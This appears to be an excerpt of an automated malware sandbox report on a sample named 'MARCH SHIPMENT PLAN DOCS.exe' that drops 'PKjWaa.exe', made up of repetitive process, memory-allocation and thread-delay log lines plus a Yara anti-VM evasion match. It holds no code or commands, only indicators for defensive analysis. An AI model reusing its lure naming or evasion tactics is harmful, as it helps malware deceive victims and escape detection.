Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory allocated: 4CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory allocated: 8990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory allocated: 9990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory allocated: 9B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory allocated: AB80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory allocated: 1750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory allocated: 30B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Memory allocated: 50B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory allocated: 1210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory allocated: 2E30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory allocated: 2C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory allocated: 8830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory allocated: 9830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory allocated: 9A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory allocated: AA10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory allocated: 1220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory allocated: 2C80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Memory allocated: 4C80000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597451	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596543	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596436	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 594641	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599779
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599666
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599435
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598891
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598671
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598342
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597905
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Thread delayed: delay time: 597030
